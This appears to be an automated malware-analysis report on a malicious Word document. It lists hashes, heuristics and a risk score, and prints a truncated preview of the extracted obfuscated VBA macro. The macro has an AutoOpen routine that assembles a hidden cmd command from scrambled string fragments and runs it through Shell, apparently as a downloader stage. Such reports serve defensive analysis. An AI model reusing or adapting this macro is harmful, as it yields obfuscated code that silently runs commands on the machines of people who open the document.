Office (OLE) malware analysis — malicious · 4a87e4dd7652003d

MALICIOUS

Office (OLE)

159.6 KB Created: 2018-07-25 14:44:00 Authoring application: Microsoft Office Word First seen: 2018-11-13

MD5: 5fc7979406eeb2571e1a105a65c7132f SHA-1: 830f44b972aeea2d0b4b3dc08985644ac3052da0 SHA-256: 4a87e4dd7652003d64720d77605b3fe0f1d6abf55cb52133439ef3fbf0c584ad

82 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a malicious Office document containing a legacy WordBasic AutoOpen macro. The macro attempts to execute a command using the Shell function, indicating it's likely a downloader or initial execution stage. The exact command executed is obfuscated through string concatenation and function calls, making precise analysis difficult.

Heuristics 4

VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30461 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	30461 bytes
SHA-256: `d32120debc50ea6b29cd140b12aff412c54ef8249176e4ed38284909321fdd19`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "YTTXDCWki" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next ssWqj = CByte(Swnnta) nbBSlm = 175425377 zJZRjd = Oct(78540955) MblHfjiJDK = "" + nmoFHCwVGZoFS + KHpMtdsQmEKCp + CVar("cm") + sLzFiErfKwpRn + WUMJHdzuCKuWB + jWovoc + jKpiYKX + sBZNiqibZE + snwjJ + QdQcmrOCM + fMXfIGzOi + KzLAHdwfH + aXwzJbl + EpzsYLpKJ + PWXDoY + UdpUKHYIzap + IBdTSRLRMz + smjcd + UAimn + RCIcYPwMoDk + PLzosrWhCv + tfPADo + UFYlIXYPX + hViRXLsw + RGrNkIjTYP + EqozjBc + pbnGidY + tSQiwOwq + qpvJZr + MGUwduTIjZ + oIirLzzlQ + UDhlGPc + CKIWpHMdtu + ApwRAtGSoZ + FhipjjiZ + zYOSz + VXZJUR + Swvza + WMRtRpmkq + rXmoFSiwl + MkjOKoim + UJMvXnCdzdi + nSciQELFPui + foLvQuvnhqiNz VUPNHj = 402893017 BSiwwp = Cos(58) Shell@ MblHfjiJDK, 0 HJikG = Sin(MORsFc) TYTjv = Sin(60335 / hJIzJ) End Sub Attribute VB_Name = "vwwbjLFnBIPj" Function jWovoc() On Error Resume Next BJdNjM = 78 zipKjrf = "d" + " " + " /c " + " " kAfclP = Atn(146165041) JLLBJ = Fix(84244 / zHHUCO - AYIGiC - 87770) nDzJMPb = " " + " " + " FOR /F " + CStr(Chr(mjCwqtuBfwDX + jVMlwWYkwrWmY + 34 + bapXlAWBsvu + bjbAIjMu)) + "delims=f" + "1= token" fahcIhW = "s=2" + CStr(Chr(NiNCnLZDVQY + NznrJUTqEs + 34 + MPWipRhU + sYwjpSrZNnW)) + " %7 " madoaF = qXSbbB kkpZz = GwFwqa twfuNnj = "IN" + " ('assoc" aYQziw = AJFStC kqBES = 46 ZStjYdYij = ".cmd')" chzMzY = CInt(PIjDQK + wtaSR * ikMwK * BRXQW) AmuNWz = CStr(35) ZOlXANCBV = "DO %7" + " " + "/v:On " + " /R " + CStr(Chr(AVrDanoJm + bvCZjwqkclGOt + 34 + AwfiYmABWIz + jGSGYEIu)) + "sEt" rrJaQ = 570 XAzkA = CInt(71084 - DlVEJf - qAnDfC * sUACw) vvqShr = Sqr(zruAVG) ZpXDv = " ]+=_/" + "/_-\-\_\-/" + "-_\ /\" BNUMtL = 113 TwzQfj = CDbl(774) LOrMjzD = "_-" + "/\//-" + "_\-\__ \\-" + "--/-/\\/__" MuFwlw = 431 awSJZRIqnT = "_/ /_\-\/\" + "--_//-__ -" + "_\/-/" + "_-_-//_\\" + " -\/__\" DKpKjF = "\/\//--" jWovoc = zipKjrf + nDzJMPb + fahcIhW + twfuNnj + ZStjYdYij + ZOlXANCBV + ZpXDv + LOrMjzD + awSJZRIqnT + DKpKjF dFBdQh = OqdSU End Function Function jKpiYKX() On Error Resume Next YznriU = CLng(bZIfH) GauhR = hznmmD IRTXTF = Cos(2) XsivJl = "-" + "_ \_" + "/__/_\" + "-\-" + "//-\" + " -_\/_" hQMGcs = Tan(236531222) nKnzpv = VACiJ uElPS = "---\\\/" + "//_ -" + "/\/" aLPiAl = Cos(5473) CrnUZnIPIn = "_-_-_\" + "/_\-\ _/-" NSzczF = Oct(4006 / VbmpwL - 39578 - ssTALb) kzkJjGkIBDu = "/_/_/\_" + "\" + "\" + "--\ /\/" + "\/--_-/_" + "_\\- -/__" iZaMLKjW = "-\/" + "-\/" + "_-_/" pvNfFR = Atn(9423) MmZQBk = Chr(5) wFVfAzdALK = "\ \-\/--" + "\_" + "_/_/" + "-_/ //\-" + "\---/_\\_" + "_/ \-" + "\" wtmTc = TrnzH Xvzliz = CSng(hItiKj) mFPfB = "_--_///" jKpiYKX = XsivJl + uElPS + CrnUZnIPIn + kzkJjGkIBDu + iZaMLKjW + wFVfAzdALK + mFPfB tqQhJI = Log(jLinb) naMwU = Oct(OGzin) End Function Function sBZNiqibZE() On Error Resume Next AXQzHD = 9 JoWio = Hex(VTVNM * vpwEjw) UiBOcAG = "\_" + "_" TwZItP = HdndDm ZUwAKz = CByte(LEqSY) PZYUZGuEVM = "\- _\" + "/__-\///--" + "\" srpSVEvB = "\_ \--_" + "_//\" + "-\_/\_- " + "_\" lhtXwt = Sin(31491 + lsnsbI * CicwB - upMURq) lEEBCBhbi = "-/_" + "//" + "_--\\" + "-" + "/\}/-" + "\_\/-\/" + "--/__" SNBTK = "_}-/\-\" + "/__\-" + "/\__-" + "{_/-\\/_\" + "_//-" + "_--" sBZNiqibZE = UiBOcAG + PZYUZGuEVM + srpSVEvB + lEEBCBhbi + SNBTK wwajrX = CBool(2033 / hfVUaZ) KlmdF = Cos(53) End Function Function snwjJ() On Error Resume Next kMXmSUsjV = "h\" + "/\" + "-\\-___" + "/-/_" UfuFm = "/c/\-\-_\/" ETkluERj = "_-/_-\_t_\" + "_" + "-/\/\_/_" + "\---" + "a\_//\__-" + "\---\/" + "_" iPTwPKzikZi = "c\//" HKihC = 2007 sqshD = 8874 EYIDaXO = "/-" + "__" + "-\-\-__/}/" + "---_\/_" + "/\_/" snwjJ = kMXmSUsjV + UfuFm + ETkluERj + iPTwPKzikZi + EYIDaXO owhAJ = ChrB(27808 * OrzvUX) hXfdW = Rnd(qWnkm) E ... (truncated)

SHA-256: d32120debc50ea6b29cd140b12aff412c54ef8249176e4ed38284909321fdd19

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "YTTXDCWki"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   ssWqj = CByte(Swnnta)
   nbBSlm = 175425377
   zJZRjd = Oct(78540955)
MblHfjiJDK = "" + nmoFHCwVGZoFS + KHpMtdsQmEKCp + CVar("cm") + sLzFiErfKwpRn + WUMJHdzuCKuWB + jWovoc + jKpiYKX + sBZNiqibZE + snwjJ + QdQcmrOCM + fMXfIGzOi + KzLAHdwfH + aXwzJbl + EpzsYLpKJ + PWXDoY + UdpUKHYIzap + IBdTSRLRMz + smjcd + UAimn + RCIcYPwMoDk + PLzosrWhCv + tfPADo + UFYlIXYPX + hViRXLsw + RGrNkIjTYP + EqozjBc + pbnGidY + tSQiwOwq + qpvJZr + MGUwduTIjZ + oIirLzzlQ + UDhlGPc + CKIWpHMdtu + ApwRAtGSoZ + FhipjjiZ + zYOSz + VXZJUR + Swvza + WMRtRpmkq + rXmoFSiwl + MkjOKoim + UJMvXnCdzdi + nSciQELFPui + foLvQuvnhqiNz
   VUPNHj = 402893017
   BSiwwp = Cos(58)
Shell@ MblHfjiJDK, 0
   HJikG = Sin(MORsFc)
   TYTjv = Sin(60335 / hJIzJ)
End Sub


Attribute VB_Name = "vwwbjLFnBIPj"
Function jWovoc()
On Error Resume Next
BJdNjM = 78
zipKjrf = "d" + "          " + "     /c   " + "       "
kAfclP = Atn(146165041)
   JLLBJ = Fix(84244 / zHHUCO - AYIGiC - 87770)
nDzJMPb = "  " + " " + "  FOR /F " + CStr(Chr(mjCwqtuBfwDX + jVMlwWYkwrWmY + 34 + bapXlAWBsvu + bjbAIjMu)) + "delims=f" + "1= token"
fahcIhW = "s=2" + CStr(Chr(NiNCnLZDVQY + NznrJUTqEs + 34 + MPWipRhU + sYwjpSrZNnW)) + " %7 "
madoaF = qXSbbB
   kkpZz = GwFwqa
twfuNnj = "IN" + " ('assoc"
aYQziw = AJFStC
   kqBES = 46
ZStjYdYij = ".cmd')"
chzMzY = CInt(PIjDQK + wtaSR * ikMwK * BRXQW)
   AmuNWz = CStr(35)
ZOlXANCBV = "DO %7" + " " + "/v:On  " + "  /R  " + CStr(Chr(AVrDanoJm + bvCZjwqkclGOt + 34 + AwfiYmABWIz + jGSGYEIu)) + "sEt"
rrJaQ = 570
   XAzkA = CInt(71084 - DlVEJf - qAnDfC * sUACw)
   vvqShr = Sqr(zruAVG)
ZpXDv = "    ]+=_/" + "/_-\-\_\-/" + "-_\ /\"
BNUMtL = 113
   TwzQfj = CDbl(774)
LOrMjzD = "_-" + "/\//-" + "_\-\__ \\-" + "--/-/\\/__"
MuFwlw = 431
awSJZRIqnT = "_/ /_\-\/\" + "--_//-__ -" + "_\/-/" + "_-_-//_\\" + " -\/__\"
DKpKjF = "\/\//--"
jWovoc = zipKjrf + nDzJMPb + fahcIhW + twfuNnj + ZStjYdYij + ZOlXANCBV + ZpXDv + LOrMjzD + awSJZRIqnT + DKpKjF
   dFBdQh = OqdSU
End Function
Function jKpiYKX()
On Error Resume Next
YznriU = CLng(bZIfH)
   GauhR = hznmmD
   IRTXTF = Cos(2)
XsivJl = "-" + "_ \_" + "/__/_\" + "-\-" + "//-\" + " -_\/_"
hQMGcs = Tan(236531222)
   nKnzpv = VACiJ
uElPS = "---\\\/" + "//_ -" + "/\/"
aLPiAl = Cos(5473)
CrnUZnIPIn = "_-_-_\" + "/_\-\ _/-"
NSzczF = Oct(4006 / VbmpwL - 39578 - ssTALb)
kzkJjGkIBDu = "/_/_/\_" + "\" + "\" + "--\ /\/" + "\/--_-/_" + "_\\- -/__"
iZaMLKjW = "-\/" + "-\/" + "_-_/"
pvNfFR = Atn(9423)
   MmZQBk = Chr(5)
wFVfAzdALK = "\ \-\/--" + "\_" + "_/_/" + "-_/ //\-" + "\---/_\\_" + "_/ \-" + "\"
wtmTc = TrnzH
   Xvzliz = CSng(hItiKj)
mFPfB = "_--_///"
jKpiYKX = XsivJl + uElPS + CrnUZnIPIn + kzkJjGkIBDu + iZaMLKjW + wFVfAzdALK + mFPfB
   tqQhJI = Log(jLinb)
   naMwU = Oct(OGzin)
End Function
Function sBZNiqibZE()
On Error Resume Next
AXQzHD = 9
   JoWio = Hex(VTVNM * vpwEjw)
UiBOcAG = "\_" + "_"
TwZItP = HdndDm
   ZUwAKz = CByte(LEqSY)
PZYUZGuEVM = "\- _\" + "/__-\///--" + "\"
srpSVEvB = "\_ \--_" + "_//\" + "-\_/\_- " + "_\"
lhtXwt = Sin(31491 + lsnsbI * CicwB - upMURq)
lEEBCBhbi = "-/_" + "//" + "_--\\" + "-" + "/\}/-" + "\_\/-\/" + "--/__"
SNBTK = "_}-/\-\" + "/__\-" + "/\__-" + "{_/-\\/_\" + "_//-" + "_--"
sBZNiqibZE = UiBOcAG + PZYUZGuEVM + srpSVEvB + lEEBCBhbi + SNBTK
   wwajrX = CBool(2033 / hfVUaZ)
   KlmdF = Cos(53)
End Function
Function snwjJ()
On Error Resume Next
kMXmSUsjV = "h\" + "/\" + "-\\-___" + "/-/_"
UfuFm = "/c/\-\-_\/"
ETkluERj = "_-/_-\_t_\" + "_" + "-/\/\_/_" + "\---" + "a\_//\__-" + "\---\/" + "_"
iPTwPKzikZi = "c\//"
HKihC = 2007
   sqshD = 8874
EYIDaXO = "/-" + "__" + "-\-\-__/}/" + "---_\/_" + "/\_/"
snwjJ = kMXmSUsjV + UfuFm + ETkluERj + iPTwPKzikZi + EYIDaXO
   owhAJ = ChrB(27808 * OrzvUX)
   hXfdW = Rnd(qWnkm)
E
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.